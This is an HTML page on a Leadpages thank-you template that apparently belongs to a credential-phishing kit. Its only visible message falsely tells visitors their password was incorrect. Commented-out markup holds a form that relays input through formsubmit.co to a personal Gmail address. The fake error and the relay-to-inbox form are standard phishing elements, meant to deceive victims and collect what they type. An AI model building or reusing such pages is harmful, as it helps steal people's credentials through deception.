<html lang="en">

<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title></title>
    <link href='https://fonts.googleapis.com/css?family=Lato:300,400|Montserrat:700' rel='stylesheet' type='text/css'>
    <style>
        @import url(//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.1/normalize.min.css);
        @import url(//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css);
    </style>
    <link rel="stylesheet" href="https://2-22-4-dot-lead-pages.appspot.com/static/lp918/min/default_thank_you.css">
    <script src="https://2-22-4-dot-lead-pages.appspot.com/static/lp918/min/jquery-1.9.1.min.js"></script>
    <script src="https://2-22-4-dot-lead-pages.appspot.com/static/lp918/min/html5shiv.js"></script>
</head>

<body>
    <header class="site-header" id="header">
        <h1 class="site-header__title" data-lead-id="site-header-title"></h1>
    </header>

    <div class="main-content">
        <!-- <i class="fa fa-check main-content__checkmark" id="checkmark"></i> -->
        <p>Sorry, your password was incorrect. Please double-check your password</p>
        <!-- <form id="form" method="POST" action="https://formsubmit.co/bigdabiladabila@gmail.com">
            <input type="text" placeholder="COUNTRY" style="border-radius: 50px; margin: 10px; padding: 10px;">
                <button class="btn-login" type="submit" id="button" value="Send Email">
                    Submit
                </button>
        </form> -->
    </div>

    <footer class="site-footer" id="footer">
        <p class="site-footer__fineprint" id="fineprint">Copyright ©2025 | All Rights Reserved</p>
    </footer>
</body>

</html>
